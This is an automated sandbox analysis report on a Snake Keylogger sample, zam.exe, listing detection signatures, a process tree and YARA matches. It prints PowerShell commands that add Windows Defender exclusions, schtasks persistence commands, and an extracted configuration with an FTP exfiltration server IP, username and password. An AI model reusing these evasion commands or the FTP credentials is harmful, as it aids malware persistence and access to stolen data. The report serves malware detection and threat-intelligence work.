Edit tour

Windows Analysis Report
zam.exe

Overview

General Information

Sample name:	zam.exe
Analysis ID:	1552315
MD5:	6ccd423abcf6bb68539f4c70419d6fc3
SHA1:	450d3110f5eca86f20823b61a4ef43fe5f35edd4
SHA256:	4bec8930b1157e64e7d785c62f4fcc4d5d144daeb954144ee3f3a5648820a9a2
Tags:	exeuser-Maciej8910871
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

zam.exe (PID: 7640 cmdline: "C:\Users\user\Desktop\zam.exe" MD5: 6CCD423ABCF6BB68539F4C70419D6FC3)

powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\zam.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8000 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8024 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 2088 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 8072 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmp8F5A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 6824 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 6008 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 5892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

HaNkyQWPIIzrnC.exe (PID: 4212 cmdline: C:\Users\user\AppData\Roaming\HaNkyQWPIIzrnC.exe MD5: 6CCD423ABCF6BB68539F4C70419D6FC3)

schtasks.exe (PID: 7692 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HaNkyQWPIIzrnC" /XML "C:\Users\user\AppData\Local\Temp\tmpA208.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 6056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "FTP", "FTP Server": "ftp://50.31.176.103/", "FTP Username": "somac@gdmaduanas.com", "Password": "HW=f09RQ-BL1", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x15266:$a1: get_encryptedPassword 0x15552:$a2: get_encryptedUsername 0x15072:$a3: get_timePasswordChanged 0x1516d:$a4: get_passwordField 0x1527c:$a5: set_encryptedPassword 0x168a0:$a7: get_logins 0x16803:$a10: KeyLoggerEventArgs 0x1646e:$a11: KeyLoggerEventArgsEventHandler
00000011.00000002.1352399273.0000000004ACE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1a1d7:$x1: $%SMTPDV$ 0x18bb8:$x2: $#TheHashHere%& 0x18b64:$x3: %FTPDV$ 0x1a2ad:$x4: $%TelegramDv$ 0x1646e:$x5: KeyLoggerEventArgs 0x16803:$x5: KeyLoggerEventArgs 0x1a1a3:$m2: Clipboard Logs ID 0x1a3fd:$m2: Screenshot Logs ID 0x1a50d:$m2: keystroke Logs ID 0x1a7e7:$m3: SnakePW 0x1a3d5:$m4: \SnakeKeylogger\
00000010.00000002.3722282255.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000015.00000002.3722196852.0000000003432000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3722282255.0000000002D04000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000015.00000002.3719586348.000000000041A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3719575603.000000000041B000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x797:$x1: $%SMTPDV$ 0x86d:$x4: $%TelegramDv$ 0x763:$m2: Clipboard Logs ID 0x9bd:$m2: Screenshot Logs ID 0xacd:$m2: keystroke Logs ID 0xda7:$m3: SnakePW 0x995:$m4: \SnakeKeylogger\
00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14fbe:$a1: get_encryptedPassword 0x359de:$a1: get_encryptedPassword 0x152aa:$a2: get_encryptedUsername 0x35cca:$a2: get_encryptedUsername 0x14dca:$a3: get_timePasswordChanged 0x357ea:$a3: get_timePasswordChanged 0x14ec5:$a4: get_passwordField 0x358e5:$a4: get_passwordField 0x14fd4:$a5: set_encryptedPassword 0x359f4:$a5: set_encryptedPassword 0x165f8:$a7: get_logins 0x37018:$a7: get_logins 0x1655b:$a10: KeyLoggerEventArgs 0x36f7b:$a10: KeyLoggerEventArgs 0x161c6:$a11: KeyLoggerEventArgsEventHandler 0x36be6:$a11: KeyLoggerEventArgsEventHandler
00000011.00000002.1352399273.0000000004B34000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19f2f:$x1: $%SMTPDV$ 0x3a94f:$x1: $%SMTPDV$ 0x18910:$x2: $#TheHashHere%& 0x39330:$x2: $#TheHashHere%& 0x188bc:$x3: %FTPDV$ 0x392dc:$x3: %FTPDV$ 0x1a005:$x4: $%TelegramDv$ 0x3aa25:$x4: $%TelegramDv$ 0x161c6:$x5: KeyLoggerEventArgs 0x1655b:$x5: KeyLoggerEventArgs 0x36be6:$x5: KeyLoggerEventArgs 0x36f7b:$x5: KeyLoggerEventArgs 0x19efb:$m2: Clipboard Logs ID 0x1a155:$m2: Screenshot Logs ID 0x1a265:$m2: keystroke Logs ID 0x3a91b:$m2: Clipboard Logs ID 0x3ab75:$m2: Screenshot Logs ID 0x3ac85:$m2: keystroke Logs ID 0x1a53f:$m3: SnakePW 0x3af5f:$m3: SnakePW 0x1a12d:$m4: \SnakeKeylogger\
00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14b36:$a1: get_encryptedPassword 0x35556:$a1: get_encryptedPassword 0x55d76:$a1: get_encryptedPassword 0x14e22:$a2: get_encryptedUsername 0x35842:$a2: get_encryptedUsername 0x56062:$a2: get_encryptedUsername 0x14942:$a3: get_timePasswordChanged 0x35362:$a3: get_timePasswordChanged 0x55b82:$a3: get_timePasswordChanged 0x14a3d:$a4: get_passwordField 0x3545d:$a4: get_passwordField 0x55c7d:$a4: get_passwordField 0x14b4c:$a5: set_encryptedPassword 0x3556c:$a5: set_encryptedPassword 0x55d8c:$a5: set_encryptedPassword 0x16170:$a7: get_logins 0x36b90:$a7: get_logins 0x573b0:$a7: get_logins 0x160d3:$a10: KeyLoggerEventArgs 0x36af3:$a10: KeyLoggerEventArgs 0x57313:$a10: KeyLoggerEventArgs
00000000.00000002.1311258310.0000000004117000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19aa7:$x1: $%SMTPDV$ 0x3a4c7:$x1: $%SMTPDV$ 0x5ace7:$x1: $%SMTPDV$ 0x18488:$x2: $#TheHashHere%& 0x38ea8:$x2: $#TheHashHere%& 0x596c8:$x2: $#TheHashHere%& 0x18434:$x3: %FTPDV$ 0x38e54:$x3: %FTPDV$ 0x59674:$x3: %FTPDV$ 0x19b7d:$x4: $%TelegramDv$ 0x3a59d:$x4: $%TelegramDv$ 0x5adbd:$x4: $%TelegramDv$ 0x15d3e:$x5: KeyLoggerEventArgs 0x160d3:$x5: KeyLoggerEventArgs 0x3675e:$x5: KeyLoggerEventArgs 0x36af3:$x5: KeyLoggerEventArgs 0x56f7e:$x5: KeyLoggerEventArgs 0x57313:$x5: KeyLoggerEventArgs 0x19a73:$m2: Clipboard Logs ID 0x19ccd:$m2: Screenshot Logs ID 0x19ddd:$m2: keystroke Logs ID
00000015.00000002.3722196852.000000000333B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000015.00000002.3722196852.0000000003161000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000010.00000002.3722282255.0000000002A31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: zam.exe PID: 7640	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: zam.exe PID: 7640	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: zam.exe PID: 7640	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3804:$a1: get_encryptedPassword 0x3ae6:$a2: get_encryptedUsername 0x361a:$a3: get_timePasswordChanged 0x3715:$a4: get_passwordField 0x381a:$a5: set_encryptedPassword 0x5cf1:$a7: get_logins 0x5c54:$a10: KeyLoggerEventArgs 0x58bf:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: zam.exe PID: 7640	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x58bf:$x5: KeyLoggerEventArgs 0x5c54:$x5: KeyLoggerEventArgs 0x655b:$x5: KeyLoggerEventArgs 0x68bc:$x5: KeyLoggerEventArgs 0x7e7b:$m2: Clipboard Logs ID 0x7f8f:$m2: Screenshot Logs ID 0x7fe5:$m2: keystroke Logs ID 0x811a:$m3: SnakePW 0x7f7b:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 5892	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5892	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: MSBuild.exe PID: 5892	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x43bb9:$m2: Clipboard Logs ID 0x43ccd:$m2: Screenshot Logs ID 0x43d23:$m2: keystroke Logs ID 0x30634:$m3: SnakePW 0x43e58:$m3: SnakePW 0x43cb9:$m4: \SnakeKeylogger\
Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12a9c:$a1: get_encryptedPassword 0x388aa:$a1: get_encryptedPassword 0x12d7e:$a2: get_encryptedUsername 0x38b8c:$a2: get_encryptedUsername 0x128b2:$a3: get_timePasswordChanged 0x386c0:$a3: get_timePasswordChanged 0x129ad:$a4: get_passwordField 0x387bb:$a4: get_passwordField 0x12ab2:$a5: set_encryptedPassword 0x388c0:$a5: set_encryptedPassword 0x14f89:$a7: get_logins 0x3ad97:$a7: get_logins 0x14eec:$a10: KeyLoggerEventArgs 0x3acfa:$a10: KeyLoggerEventArgs 0x14b57:$a11: KeyLoggerEventArgsEventHandler 0x3a965:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: HaNkyQWPIIzrnC.exe PID: 4212	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x14b57:$x5: KeyLoggerEventArgs 0x14eec:$x5: KeyLoggerEventArgs 0x157f3:$x5: KeyLoggerEventArgs 0x15b54:$x5: KeyLoggerEventArgs 0x3a965:$x5: KeyLoggerEventArgs 0x3acfa:$x5: KeyLoggerEventArgs 0x3b601:$x5: KeyLoggerEventArgs 0x3b962:$x5: KeyLoggerEventArgs 0x17113:$m2: Clipboard Logs ID 0x17227:$m2: Screenshot Logs ID 0x1727d:$m2: keystroke Logs ID 0x3cf21:$m2: Clipboard Logs ID 0x3d035:$m2: Screenshot Logs ID 0x3d08b:$m2: keystroke Logs ID 0x173b2:$m3: SnakePW 0x3d1c0:$m3: SnakePW 0x17213:$m4: \SnakeKeylogger\ 0x3d021:$m4: \SnakeKeylogger\
Process Memory Space: MSBuild.exe PID: 6056	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 6056	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Click to see the 30 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.zam.exe.4117110.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam.exe.4117110.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
0.2.zam.exe.4117110.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
0.2.zam.exe.4117110.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1a5a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x197d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x19c06:$a4: \Orbitum\User Data\Default\Login Data 0x1ac45:$a5: \Kometa\User Data\Default\Login Data
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
0.2.zam.exe.4117110.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x137de:$s1: UnHook 0x137e5:$s2: SetHook 0x137ed:$s3: CallNextHook 0x137fa:$s4: _hook
0.2.zam.exe.4117110.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17b97:$x1: $%SMTPDV$ 0x16578:$x2: $#TheHashHere%& 0x16524:$x3: %FTPDV$ 0x17c6d:$x4: $%TelegramDv$ 0x13e2e:$x5: KeyLoggerEventArgs 0x141c3:$x5: KeyLoggerEventArgs 0x17b63:$m2: Clipboard Logs ID 0x17dbd:$m2: Screenshot Logs ID 0x17ecd:$m2: keystroke Logs ID 0x181a7:$m3: SnakePW 0x17d95:$m4: \SnakeKeylogger\
16.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
16.2.MSBuild.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x15c2e:$a11: KeyLoggerEventArgsEventHandler
16.2.MSBuild.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data
16.2.MSBuild.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID 0x19fa7:$m3: SnakePW 0x19b95:$m4: \SnakeKeylogger\
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b54fb8.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.zam.exe.4117110.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam.exe.4117110.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.zam.exe.4117110.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0.2.zam.exe.4117110.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x14a26:$a1: get_encryptedPassword 0x35446:$a1: get_encryptedPassword 0x55c66:$a1: get_encryptedPassword 0x14d12:$a2: get_encryptedUsername 0x35732:$a2: get_encryptedUsername 0x55f52:$a2: get_encryptedUsername 0x14832:$a3: get_timePasswordChanged 0x35252:$a3: get_timePasswordChanged 0x55a72:$a3: get_timePasswordChanged 0x1492d:$a4: get_passwordField 0x3534d:$a4: get_passwordField 0x55b6d:$a4: get_passwordField 0x14a3c:$a5: set_encryptedPassword 0x3545c:$a5: set_encryptedPassword 0x55c7c:$a5: set_encryptedPassword 0x16060:$a7: get_logins 0x36a80:$a7: get_logins 0x572a0:$a7: get_logins 0x15fc3:$a10: KeyLoggerEventArgs 0x369e3:$a10: KeyLoggerEventArgs 0x57203:$a10: KeyLoggerEventArgs
0.2.zam.exe.4117110.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1c3a1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3cdc1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x5d5e1:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1b5d3:$a3: \Google\Chrome\User Data\Default\Login Data 0x3bff3:$a3: \Google\Chrome\User Data\Default\Login Data 0x5c813:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ba06:$a4: \Orbitum\User Data\Default\Login Data 0x3c426:$a4: \Orbitum\User Data\Default\Login Data 0x5cc46:$a4: \Orbitum\User Data\Default\Login Data 0x1ca45:$a5: \Kometa\User Data\Default\Login Data 0x3d465:$a5: \Kometa\User Data\Default\Login Data 0x5dc85:$a5: \Kometa\User Data\Default\Login Data
0.2.zam.exe.4117110.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x155de:$s1: UnHook 0x35ffe:$s1: UnHook 0x5681e:$s1: UnHook 0x155e5:$s2: SetHook 0x36005:$s2: SetHook 0x56825:$s2: SetHook 0x155ed:$s3: CallNextHook 0x3600d:$s3: CallNextHook 0x5682d:$s3: CallNextHook 0x155fa:$s4: _hook 0x3601a:$s4: _hook 0x5683a:$s4: _hook
0.2.zam.exe.4117110.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x19997:$x1: $%SMTPDV$ 0x3a3b7:$x1: $%SMTPDV$ 0x5abd7:$x1: $%SMTPDV$ 0x18378:$x2: $#TheHashHere%& 0x38d98:$x2: $#TheHashHere%& 0x595b8:$x2: $#TheHashHere%& 0x18324:$x3: %FTPDV$ 0x38d44:$x3: %FTPDV$ 0x59564:$x3: %FTPDV$ 0x19a6d:$x4: $%TelegramDv$ 0x3a48d:$x4: $%TelegramDv$ 0x5acad:$x4: $%TelegramDv$ 0x15c2e:$x5: KeyLoggerEventArgs 0x15fc3:$x5: KeyLoggerEventArgs 0x3664e:$x5: KeyLoggerEventArgs 0x369e3:$x5: KeyLoggerEventArgs 0x56e6e:$x5: KeyLoggerEventArgs 0x57203:$x5: KeyLoggerEventArgs 0x19963:$m2: Clipboard Logs ID 0x19bbd:$m2: Screenshot Logs ID 0x19ccd:$m2: keystroke Logs ID
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12c26:$a1: get_encryptedPassword 0x12f12:$a2: get_encryptedUsername 0x12a32:$a3: get_timePasswordChanged 0x12b2d:$a4: get_passwordField 0x12c3c:$a5: set_encryptedPassword 0x14260:$a7: get_logins 0x141c3:$a10: KeyLoggerEventArgs 0x13e2e:$a11: KeyLoggerEventArgsEventHandler
0.2.zam.exe.4137b30.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.zam.exe.4137b30.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
17.2.HaNkyQWPIIzrnC.exe.4b34598.4.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
